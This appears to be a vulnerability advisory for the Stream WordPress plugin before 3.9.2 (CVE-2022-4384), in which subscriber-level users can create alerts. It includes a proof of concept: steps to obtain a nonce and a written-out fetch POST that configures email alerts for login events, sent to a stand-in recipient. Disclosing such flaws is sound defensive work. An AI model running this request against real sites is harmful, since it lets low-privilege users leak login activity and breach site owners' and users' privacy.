Lucene search
Krzysztof ZającWPEX-ID:2B506252-6F37-439E-8984-7316D5CCA2E5HistoryJan 16, 2023 - 12:00 a.m.
Stream < 3.9.2 - Subscriber+ Alert Creation
2023-01-1600:00:00
Krzysztof Zając
67
stream 3.9.2
subscriber
alert creation
log in
nonce
configuration
fetch request
exploit
0.001 Low
EPSS
Percentile
29.7%
The plugin does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.
Step 1: Log in as a subscriber
Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications
Step 3: Configure the alerts via:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},"method":"POST",
"body": "action=save_new_alert&wp_stream_alerts_nonce=XXXX&wp_stream_trigger_author=&wp_stream_trigger_context=users-sessions&wp_stream_trigger_action=login&wp_stream_alert_type=email&wp_stream_alert_status=wp_stream_enabled&wp_stream_email_recipient=recipient%40example.com&wp_stream_email_subject=test",
});Related
cvelist
cvelist
CVE-2022-4384 Stream < 3.9.2 - Subscriber+ Alert Creation
2023-02-06 19:59:16
wpvulndb
wpvulndb
Stream < 3.9.2 - Subscriber+ Alert Creation
2023-01-16 00:00:00
cve
cve
CVE-2022-4384
2023-02-06 20:15:11
prion
prion
Information disclosure
2023-02-06 20:15:00
nvd
nvd
CVE-2022-4384
2023-02-06 20:15:11